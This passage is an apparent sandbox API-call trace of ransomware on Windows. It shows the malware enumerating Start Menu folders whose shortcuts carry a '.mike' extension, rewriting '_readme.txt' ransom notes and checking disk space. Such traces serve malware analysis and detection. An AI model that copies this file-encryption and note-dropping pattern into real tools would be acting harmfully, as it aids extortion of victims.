0x50 [0156.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.363] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0dc | out: lpFileInformation=0x2af0dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26754960, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x26754960, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x267c6d80, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680)) returned 1 [0156.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.363] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 0x50 [0156.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0156.363] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2141dc4 | out: lpFileInformation=0x2141dc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26754960, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x26754960, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x267c6d80, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680)) returned 1 [0156.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0156.363] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 0x50 [0156.363] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.365] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aec08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 0x50 [0156.365] DeleteFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt")) returned 1 [0156.366] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 0x50 [0156.367] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.367] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt"), fInfoLevelId=0x0, lpFileInformation=0x2af0dc | out: lpFileInformation=0x2af0dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0156.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.367] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt", lpFilePart=0x0) returned 0x50 [0156.367] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef90) returned 1 [0156.367] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\maintenance\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0156.368] GetFileType (hFile=0x1c8) returned 0x1 [0156.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef8c) returned 1 [0156.368] GetFileType (hFile=0x1c8) returned 0x1 [0156.368] WriteFile (in: hFile=0x1c8, lpBuffer=0x2143b30*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af028, lpOverlapped=0x0 | out: lpBuffer=0x2143b30*, lpNumberOfBytesWritten=0x2af028*=0x45e, lpOverlapped=0x0) returned 1 [0156.369] CloseHandle (hObject=0x1c8) returned 1 [0156.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0156.369] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", lpFilePart=0x0) returned 0x44 [0156.369] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", nBufferLength=0x105, lpBuffer=0x2aebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\", lpFilePart=0x0) returned 0x45 [0156.370] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c78c4a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c78c4a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c7b2600, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x740, dwReserved0=0x0, dwReserved1=0x0, cFileName="Backup and Restore Center.lnk.mike", cAlternateFileName="BACKUP~1.MIK")) returned 1 [0156.371] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7b2600, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7b2600, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c7b2600, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x700, dwReserved0=0x0, dwReserved1=0x0, cFileName="Create Recovery Disc.lnk.mike", cAlternateFileName="CREATE~1.MIK")) returned 1 [0156.371] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec13fc0c, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xec13fc0c, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x8ab6d126, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x25e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0156.371] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7b2600, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7b2600, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c7d8760, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x6e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Remote Assistance.lnk.mike", cAlternateFileName="REMOTE~1.MIK")) returned 1 [0156.371] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7b2600, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x267c6d80, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x267c6d80, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0156.372] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26754960, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x26754960, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x267c6d80, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt.mike", cAlternateFileName="_READM~1.MIK")) returned 1 [0156.372] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26754960, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x26754960, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x267c6d80, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt.mike", cAlternateFileName="_READM~1.MIK")) returned 0 [0156.372] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0156.372] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\.", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office", lpFilePart=0x0) returned 0x49 [0156.372] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.372] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.373] CoTaskMemFree (pv=0x508980) [0156.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0156.374] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7d8760, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7d8760, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c7d8760, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xd90, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Access 2010.lnk.mike", cAlternateFileName="MICROS~1.MIK")) returned 1 [0156.375] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c870ce0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c870ce0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c896e40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xd60, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft OneNote 2010.lnk.mike", cAlternateFileName="MI5A1E~1.MIK")) returned 1 [0156.377] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0156.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0156.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0156.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d8) returned 1 [0156.379] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0156.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0156.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0156.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0156.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0156.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.382] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\_readme.txt", lpFilePart=0x0) returned 0x55 [0156.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc8) returned 1 [0156.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc4) returned 1 [0156.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0156.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0156.385] WriteFile (in: hFile=0x1c8, lpBuffer=0x2166678*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x2166678*, lpNumberOfBytesWritten=0x2aefe4*=0x220, lpOverlapped=0x0) returned 1 [0156.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0156.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0156.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0156.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0156.389] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\_readme.txt.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\_readme.txt.mike", lpFilePart=0x0) returned 0x5a [0156.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0156.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0156.390] WriteFile (in: hFile=0x1c8, lpBuffer=0x216c0ac*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x216c0ac*, lpNumberOfBytesWritten=0x2aefe4*=0x460, lpOverlapped=0x0) returned 1 [0156.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef6c) returned 1 [0156.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef68) returned 1 [0156.460] WriteFile (in: hFile=0x1c8, lpBuffer=0x216f2f4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x216f2f4*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0156.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0156.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0156.462] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.464] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.464] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.464] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef90) returned 1 [0156.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef8c) returned 1 [0156.466] WriteFile (in: hFile=0x1c8, lpBuffer=0x2172904*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af028, lpOverlapped=0x0 | out: lpBuffer=0x2172904*, lpNumberOfBytesWritten=0x2af028*=0x45e, lpOverlapped=0x0) returned 1 [0156.467] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0156.468] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7d8760, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7d8760, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c7d8760, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xd90, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Access 2010.lnk.mike", cAlternateFileName="MICROS~1.MIK")) returned 1 [0156.468] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7fe8c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7fe8c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c7fe8c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xdb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Excel 2010.lnk.mike", cAlternateFileName="MICROS~2.MIK")) returned 1 [0156.469] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7fe8c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7fe8c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c7fe8c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xe10, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft InfoPath Designer 2010.lnk.mike", cAlternateFileName="MICROS~3.MIK")) returned 1 [0156.469] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c870ce0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c870ce0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c870ce0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft InfoPath Filler 2010.lnk.mike", cAlternateFileName="MICROS~4.MIK")) returned 1 [0156.470] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77f53bd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1c9c7940, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c9c7940, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office 2010 Tools", cAlternateFileName="MICROS~1")) returned 1 [0156.471] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c896e40, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c896e40, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c896e40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Outlook 2010.lnk.mike", cAlternateFileName="MI6EEB~1.MIK")) returned 1 [0156.471] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c896e40, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c896e40, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c8bcfa0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft PowerPoint 2010.lnk.mike", cAlternateFileName="MIA75D~1.MIK")) returned 1 [0156.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8bcfa0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c8bcfa0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c8bcfa0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Project 2010.lnk.mike", cAlternateFileName="MI6F70~1.MIK")) returned 1 [0156.472] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8e3100, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c8e3100, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c8e3100, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xe10, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Publisher 2010.lnk.mike", cAlternateFileName="MI0D6C~1.MIK")) returned 1 [0156.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8e3100, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c8e3100, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c909260, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xe10, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SharePoint Workspace 2010.lnk.mike", cAlternateFileName="MI4C95~1.MIK")) returned 1 [0156.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c909260, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c909260, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c92f3c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xcf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Visio 2010.lnk.mike", cAlternateFileName="MIBA2C~1.MIK")) returned 1 [0156.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c92f3c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c92f3c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c92f3c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xdf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Word 2010.lnk.mike", cAlternateFileName="MI5F0B~1.MIK")) returned 1 [0156.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7d8760, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x268ab5c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x268ab5c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0156.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x267ecee0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x267ecee0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x268ab5c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt.mike", cAlternateFileName="_READM~1.MIK")) returned 1 [0156.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x267ecee0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x267ecee0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x268ab5c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, 